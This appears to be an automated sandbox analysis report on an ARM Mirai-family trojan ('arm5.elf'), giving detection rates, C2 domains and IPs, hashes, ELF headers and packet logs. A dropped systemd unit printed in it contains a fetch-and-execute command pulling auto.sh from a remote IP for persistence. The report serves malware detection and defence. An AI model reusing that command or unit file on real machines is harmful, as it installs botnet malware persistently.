Source: arm5.elf, 5484.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5535.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5537.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5539.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5545.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5547.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5556.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5564.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5566.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5608.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5610.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5640.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5643.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5652.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5661.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5666.1.0000558861982000.0000558861ad1000.rw-.sdmp, arm5.elf, 5671.1.0000558861982000.0000558861ad1000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: arm5.elf, 5796.1.00007fc32c045000.00007fc32c252000.rw-.sdmp	Binary or memory string: /var/lib/vmware/VGAuth
Source: arm5.elf, 5484.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5535.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5537.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5539.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5545.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5547.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5556.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5564.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5566.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5608.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5610.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5640.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5643.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5652.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5661.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5666.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5671.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: arm5.elf, 5484.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5535.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5537.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5539.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5545.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5547.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5556.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5564.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5566.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5608.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5610.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5640.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5643.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5652.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5661.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5666.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp, arm5.elf, 5671.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp	Binary or memory string: ,x86_64/usr/bin/qemu-arm/tmp/arm5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm5.elf
Source: arm5.elf, 5796.1.00007fc32c034000.00007fc32c045000.rw-.sdmp	Binary or memory string: P/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-PB7Ovf$/tmp/vmware-root_727-4290690966X/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-WfFmsi4/tmp/hsperfdata_root
Source: arm5.elf, 5484.1.00007ffc1b0b4000.00007ffc1b0d5000.rw-.sdmp	Binary or memory string: /tmp/qemu-open.uRTK8R
Source: arm5.elf, 5796.1.00007fc32c045000.00007fc32c252000.rw-.sdmp	Binary or memory string: /var/lib/vmware/VGAuth4/var/lib/NetworkManagerxM
Source: arm5.elf, 5796.1.0000558861982000.0000558861ad1000.rw-.sdmp	Binary or memory string: 0!/proc/30/cmdline1/tmp/vmware-root_727-4290690966

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Systemd Service	1 Systemd Service	1 Hidden Files and Directories	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Scripting	Boot or Logon Initialization Scripts	1 Indicator Removal	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
arm5.elf	55%	ReversingLabs	Linux.Trojan.Mirai
arm5.elf	56%	Virustotal		Browse
arm5.elf	100%	Avira	EXP/ELF.Mirai.W

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
tcpdown.su	45.200.149.95	true	false	high
tcpdown.su\|1	unknown	unknown	false	unknown
tcpdown.suo. [malformed]	unknown	unknown	true	unknown
tcpdown.su	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://154.216.20.138/auto.sh;	arm5.elf, startup_command.service.13.dr	false		high
http://154.216.20.138/auto.sh	startup_command.service.13.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
107.175.130.16	unknown	United States		36352	AS-COLOCROSSINGUS	false
104.168.33.8	unknown	United States		36352	AS-COLOCROSSINGUS	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
107.175.130.16	sh4.elf	Get hash	malicious	Unknown	Browse
	powerpc.elf	Get hash	malicious	Unknown	Browse
	arm.elf	Get hash	malicious	Unknown	Browse
	sparc.elf	Get hash	malicious	Unknown	Browse
	m68k.elf	Get hash	malicious	Unknown	Browse
	i686.elf	Get hash	malicious	Unknown	Browse
	i586.elf	Get hash	malicious	Unknown	Browse
	sh4.elf	Get hash	malicious	Unknown	Browse
	powerpc.elf	Get hash	malicious	Unknown	Browse
	i586.elf	Get hash	malicious	Unknown	Browse
104.168.33.8	mips.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
	x86_64.elf	Get hash	malicious	Unknown	Browse
	powerpc.elf	Get hash	malicious	Unknown	Browse
	sparc.elf	Get hash	malicious	Unknown	Browse
	powerpc.elf	Get hash	malicious	Unknown	Browse
	sparc.elf	Get hash	malicious	Unknown	Browse
	x86_64.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
tcpdown.su	x86_64.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
tcpdown.su	sparc.elf	Get hash	malicious	Unknown	Browse	45.200.149.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	mips.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	mpsl.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	sh4.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	x86_64.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	powerpc.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	arm.elf	Get hash	malicious	Unknown	Browse	23.94.242.130
	sparc.elf	Get hash	malicious	Unknown	Browse	23.94.242.130
	m68k.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	i686.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	i586.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
AS-COLOCROSSINGUS	mips.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	mpsl.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	sh4.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	x86_64.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	powerpc.elf	Get hash	malicious	Unknown	Browse	104.168.33.8
	arm.elf	Get hash	malicious	Unknown	Browse	23.94.242.130
	sparc.elf	Get hash	malicious	Unknown	Browse	23.94.242.130
	m68k.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	i686.elf	Get hash	malicious	Unknown	Browse	107.175.130.16
	i586.elf	Get hash	malicious	Unknown	Browse	107.175.130.16

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/etc/systemd/system/startup_command.service

Download File

Process:	/tmp/arm5.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	361
Entropy (8bit):	5.16738909970438
Encrypted:	false
SSDEEP:	6:z8jvIERZAMzdK+KOnFfltZCrXbcCmBNcCm4RcCmO/Ls7QkhILQmWA4Rv:z+vIERZAOK+PCrXIpiQuj73GLHWrv
MD5:	AF7D62B73266E0B457B114FE91F7E926
SHA1:	11261AEF4573B56B67B32020049C69C7282FC212
SHA-256:	14CB525E5A6B8AAF20C38672F8A9F974A684990888214848818326A739906642
SHA-512:	3926FBB53496C3AAA34CC782BD5C8379E0AB94B11FE4E63BBBFEAC4E2B5057369C94BBE25AC56C3F04363076C91B978F9199FED97C5ED8377A6DC852B01EBFD9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Unit].Description=Startup Command.After=network.target..[Service].ExecStart=cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd / \|\| cd /home; wget http://154.216.20.138/auto.sh \|\| busybox wget http://154.216.20.138/auto.sh \|\| curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh (null).RemainAfterExit=yes..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/tmp/qemu-open.uRTK8R (deleted)

Download File

Process:	/tmp/arm5.elf
File Type:	data
Category:	dropped
Size (bytes):	14
Entropy (8bit):	3.521640636343319
Encrypted:	false
SSDEEP:	3:TggLAJ5:Tgg03
MD5:	A737667E3E61E716C83359F35BC141DA
SHA1:	E7C3DBC96B90E28F18CFB1CADE0C7AF673FFAA57
SHA-256:	2D8A0F430A3339E16B223D653251534539D95B1DF7142834F68D9172B1656E37
SHA-512:	0ACAFC3F3F40EDEF3D9F2F1CCE09BAF5004FD8488434F4903F18B9B7E77B4A6CDF7F84A47856CB2FDAA4B1B0F70FC2A3EDDE82BD29831FF54CB75F4E4C74FE74
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	/tmp/arm5.elf.

Static File Info

General

File type:	ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
Entropy (8bit):	5.814382741411491
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	arm5.elf
File size:	83'344 bytes
MD5:	69a1790982af9b8302696a012e9fc07a
SHA1:	1c4f8ae74cd4778624ea58a826dfb3c7dd33979a
SHA256:	1b04a271136e186d32999cd8cb762e51c056620c4482668cd7efdb49cb6d4dbf
SHA512:	b19eba5d4555f0b0f703ae99a3ba8b91ece1bf16acd82d500e993f81abf8eda6c574e31ce0b3183b64a8da6d2a0837d7d0170ccc51fd50add6e7ad4d6ecf78a1
SSDEEP:	1536:ih+1IWRBh2N3+SDY/uFMrZa/a4vNXAVBtF748KtYUngTBY4:ih+ba0dda/aSVAVXF74J+Ta4
TLSH:	F2834A92BD815A13C5D5227BFB6E028D372663A8D3EF3243DD266F20778692B0D77601
File Content Preview:	.ELF...a..........(.........4....D......4. ...(......................8...8...............@...@...@..................Q.td..................................-...L."...\C..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	ARM
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	ARM - ABI
ABI Version:	0
Entry Point Address:	0x8190
Flags:	0x2
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	82944
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x8094	0x94	0x18	0x0	0x6	AX	4
.text	PROGBITS	0x80b0	0xb0	0x10da8	0x0	0x6	AX	16
.fini	PROGBITS	0x18e58	0x10e58	0x14	0x0	0x6	AX	4
.rodata	PROGBITS	0x18e6c	0x10e6c	0x2a6c	0x0	0x2	A	4
.ctors	PROGBITS	0x24000	0x14000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x24008	0x14008	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x24014	0x14014	0x3ac	0x0	0x3	WA	4
.bss	NOBITS	0x243c0	0x143c0	0xe714	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x143c0	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8000	0x8000	0x138d8	0x138d8	5.9243	0x5	R E	0x8000	.init .text .fini .rodata
LOAD	0x14000	0x24000	0x24000	0x3c0	0xead4	2.7677	0x6	RW	0x8000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 01:27:56.100620031 CET	50380	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:27:56.105757952 CET	2601	50380	104.168.33.8	192.168.2.13
Jan 7, 2025 01:27:56.105921030 CET	50380	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:27:56.108567953 CET	50380	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:27:56.113316059 CET	2601	50380	104.168.33.8	192.168.2.13
Jan 7, 2025 01:27:56.113357067 CET	50380	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:27:56.118159056 CET	2601	50380	104.168.33.8	192.168.2.13
Jan 7, 2025 01:27:56.658688068 CET	2601	50380	104.168.33.8	192.168.2.13
Jan 7, 2025 01:27:56.658775091 CET	50380	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:27:56.659061909 CET	50380	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:28:01.382090092 CET	52438	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:01.386967897 CET	7722	52438	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:01.387029886 CET	52438	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:01.390841961 CET	52440	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:01.392115116 CET	52438	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:01.392174959 CET	52438	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:01.395627975 CET	7722	52440	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:01.395695925 CET	52440	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:01.396855116 CET	7722	52438	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:01.411919117 CET	52440	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:01.412045002 CET	52440	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:01.416661024 CET	7722	52440	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:01.439678907 CET	7722	52438	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:01.459680080 CET	7722	52440	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:01.685743093 CET	52442	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:01.690558910 CET	7722	52442	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:01.690612078 CET	52442	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:01.695343018 CET	52442	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:01.695424080 CET	52442	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:01.700244904 CET	7722	52442	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:01.743688107 CET	7722	52442	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:01.755120039 CET	7722	52438	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:01.755198956 CET	52438	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:01.769399881 CET	7722	52440	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:01.769462109 CET	52440	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:02.077132940 CET	7722	52442	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:02.077193975 CET	52442	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:02.485888004 CET	52444	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:02.490808010 CET	7722	52444	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:02.490916014 CET	52444	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:02.493693113 CET	52444	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:02.493693113 CET	52444	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:02.498461008 CET	7722	52444	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:02.539712906 CET	7722	52444	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:02.567574024 CET	52446	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:02.572386980 CET	7722	52446	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:02.572453976 CET	52446	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:02.582211971 CET	52446	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:02.582329988 CET	52446	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:02.587034941 CET	7722	52446	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:02.627687931 CET	7722	52446	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:02.765993118 CET	52448	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:02.770775080 CET	7722	52448	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:02.770821095 CET	52448	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:02.775391102 CET	52448	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:02.775391102 CET	52448	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:02.780216932 CET	7722	52448	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:02.823714972 CET	7722	52448	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:02.874125957 CET	7722	52444	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:02.874180079 CET	52444	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:02.960850000 CET	7722	52446	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:02.960897923 CET	52446	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:03.154674053 CET	7722	52448	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:03.154721022 CET	52448	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:07.509596109 CET	52450	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:07.521919012 CET	52452	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:07.666956902 CET	7722	52450	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:07.666975975 CET	7722	52452	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:07.667006016 CET	52450	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:07.667052984 CET	52452	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:07.668369055 CET	52450	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:07.668474913 CET	52450	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:07.668728113 CET	52452	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:07.668728113 CET	52452	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:07.673086882 CET	7722	52450	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:07.673464060 CET	7722	52452	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:07.715747118 CET	7722	52452	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:07.715759993 CET	7722	52450	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:08.031955004 CET	7722	52450	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:08.032018900 CET	52450	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:08.047702074 CET	7722	52452	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:08.047755957 CET	52452	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:12.608144045 CET	52454	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:12.613045931 CET	7722	52454	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:12.613107920 CET	52454	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:12.614460945 CET	52454	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:12.614532948 CET	52454	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:12.619251013 CET	7722	52454	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:12.663681030 CET	7722	52454	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:12.680284977 CET	52456	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:12.685132980 CET	7722	52456	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:12.685192108 CET	52456	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:12.687294006 CET	52456	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:12.687391043 CET	52456	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:12.692039013 CET	7722	52456	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:12.735709906 CET	7722	52456	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:12.992847919 CET	7722	52454	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:12.992918015 CET	52454	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:13.083017111 CET	7722	52456	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:13.083070040 CET	52456	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:17.578749895 CET	52458	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:17.581921101 CET	52460	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:17.583579063 CET	7722	52458	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:17.583642960 CET	52458	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:17.586257935 CET	52458	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:17.586411953 CET	52458	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:17.586767912 CET	7722	52460	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:17.586826086 CET	52460	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:17.591072083 CET	7722	52458	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:17.612242937 CET	52460	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:17.612317085 CET	52460	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:17.617031097 CET	7722	52460	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:17.631680012 CET	7722	52458	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:17.659681082 CET	7722	52460	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:17.971406937 CET	7722	52460	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:17.971482038 CET	52460	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:17.976633072 CET	7722	52458	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:17.976696968 CET	52458	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:22.625546932 CET	52462	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:22.630441904 CET	7722	52462	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:22.630506039 CET	52462	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:22.630822897 CET	52462	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:22.630899906 CET	52462	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:22.635582924 CET	7722	52462	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:22.679672003 CET	7722	52462	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:22.825553894 CET	50408	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:28:22.830370903 CET	2601	50408	104.168.33.8	192.168.2.13
Jan 7, 2025 01:28:22.830418110 CET	50408	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:28:22.831427097 CET	50408	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:28:22.836240053 CET	2601	50408	104.168.33.8	192.168.2.13
Jan 7, 2025 01:28:22.836289883 CET	50408	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:28:22.841129065 CET	2601	50408	104.168.33.8	192.168.2.13
Jan 7, 2025 01:28:23.009857893 CET	7722	52462	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:23.009907961 CET	52462	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:23.396008015 CET	2601	50408	104.168.33.8	192.168.2.13
Jan 7, 2025 01:28:23.396064997 CET	50408	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:28:23.396094084 CET	50408	2601	192.168.2.13	104.168.33.8
Jan 7, 2025 01:28:27.681282997 CET	52466	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:27.686155081 CET	7722	52466	107.175.130.16	192.168.2.13
Jan 7, 2025 01:28:27.686219931 CET	52466	7722	192.168.2.13	107.175.130.16
Jan 7, 2025 01:28:27.686578989 CET	52466	7722	192.168.2.13	107.175.130.16
